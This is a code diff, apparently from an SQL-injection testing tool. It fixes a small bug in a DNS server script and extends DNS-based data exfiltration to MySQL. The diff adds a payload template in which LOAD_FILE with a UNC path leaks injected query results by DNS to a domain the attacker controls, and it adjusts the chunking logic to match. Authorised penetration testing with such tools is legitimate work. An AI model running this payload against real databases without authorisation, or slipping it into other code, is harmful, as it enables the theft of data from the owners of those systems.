diff --git a/lib/request/dns.py b/lib/request/dns.py index 0fdf6a8aa..d1c931f5b 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -95,6 +95,7 @@ class DNSServer: thread.start() if __name__ == "__main__": + server = None try: server = DNSServer() server.run() @@ -118,4 +119,6 @@ if __name__ == "__main__": except KeyboardInterrupt: os._exit(0) finally: - server._running = False + if server: + server._running = False + diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 64bb08970..cffad47bf 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -52,7 +52,7 @@ def dnsUse(payload, expression): count = 0 offset = 1 - if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE): + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: @@ -64,7 +64,7 @@ def dnsUse(payload, expression): while True: count += 1 prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 if Backend.isDbms(DBMS.ORACLE) else MAX_DNS_LABEL / 4 - 2 + chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL) else MAX_DNS_LABEL / 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) diff --git a/procs/mysql/dns_request.txt b/procs/mysql/dns_request.txt new file mode 100644 index 000000000..051cd276f --- /dev/null +++ b/procs/mysql/dns_request.txt @@ -0,0 +1 @@ +SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%PREFIX%%SUFFIX%')) \ No newline at end of file